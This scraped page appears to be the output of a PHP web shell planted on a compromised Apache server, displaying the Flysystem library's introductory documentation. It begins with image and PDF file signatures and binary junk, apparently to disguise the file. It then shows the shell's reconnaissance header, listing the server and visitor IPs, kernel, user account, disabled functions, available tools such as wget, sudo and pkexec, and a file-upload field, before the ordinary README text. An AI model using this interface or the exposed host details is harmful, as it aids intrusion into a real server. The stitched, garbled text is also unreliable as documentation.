ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 157.90.209.209 / Your IP : 216.73.216.129 [ Web Server : Apache System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64 User : evidenciarevista ( 1049) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Domains : 216 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/evidenciarevista/_api/vendor/league/flysystem/docs/ |
Upload File : |
--- layout: default permalink: / title: Introduction --- # Introduction [](//twitter.com/frankdejonge) [](//github.com/thephpleague/flysystem) [](//github.com/thephpleague/flysystem/releases) [](//github.com/thephpleague/flysystem/blob/master/LICENSE) [](//travis-ci.org/thephpleague/flysystem) [](//scrutinizer-ci.com/g/thephpleague/flysystem/code-structure) [](//scrutinizer-ci.com/g/thephpleague/flysystem) [](//packagist.org/packages/league/flysystem)  Flysystem is a filesystem abstraction which allows you to easily swap out a local filesystem for a remote one. Technical debt is reduced as is the chance of vendor lock-in. ### Gold Sponsors <a href="https://laravel.com/"><img src="/logo/laravel.svg" alt="Laravel.com" height="100px" /></a> View all the [sponsors](/sponsors/). ## Goals * Have a generic API for handling common tasks across multiple file storage engines. * Have consistent output which you can rely on. * Integrate well with other packages/frameworks. * Be cacheable. * Emulate directories in systems that support none, like AwsS3. * Support third party plugins. * Make it easy to test your filesystem interactions. * Support streams for big file handling ## Development Sponsors In order to free up more time to work on maintenance of this package I'm looking for sponsors. If you (or your company), want to sponsor my efforts, consider becoming a sponsor via Patreon <a href="https://www.patreon.com/bePatron?u=8623643"><img src="/logo/become_a_patron_button.png" alt="Become a Patron!" title="Become a Patron!"/></a> ## Questions? Flysystem was created by Frank de Jonge, follow him on Twitter for updates: [@frankdejonge](//twitter.com/frankdejonge). Please submit issues on [Github](//github.com/thephpleague/flysystem).